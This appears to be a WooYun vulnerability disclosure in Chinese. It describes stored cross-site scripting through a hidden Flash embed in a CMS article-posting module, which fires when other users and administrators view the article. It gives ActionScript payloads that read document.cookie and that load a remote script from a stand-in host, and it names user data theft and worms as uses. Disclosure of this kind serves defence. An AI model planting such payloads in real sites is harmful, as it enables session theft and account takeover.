WooYun.org

存在漏洞的模块为发表新闻和发表文章模块，以发表文章为例对漏洞进行证明。
1、登录系统，进入会员中心---》投稿---》管理文章---》增加信息，填写文章内容，在新闻正文中点击flash按钮导入flash。

将宽度和高度设置为0，增加了恶意代码的隐蔽性。xss.swf中包含的恶意代码为：getURL("javascript:alert(document.cookie)");
2、拦截请求，在<embed>标签中增加属性allowscriptaccess="always".

3、其它用户浏览文章信息，漏洞触发：

4、使用Firebug查看页面源代码：

flash标签成功插入，且允许执行脚本代码
5、后台管理员浏览文章时，漏洞同样触发：

6、修改xss.swf中的恶意代码为：
import flash.external.ExternalInterface;
ExternalInterface.call("eval","d=document;e=d.createElement('script');e.src='http://127.0.0.1/eXploit.js';d.body.appendChild(e);");//使用ExternalInterface.call()函数加载本地脚本文件，通过修改本地脚本文件内容我们可以进行盗取用户信息、钓鱼，编写蠕虫等操作。
漏洞触发时，成功加载本地脚本：

通过修改本地脚本代码，可以进行针对性的攻击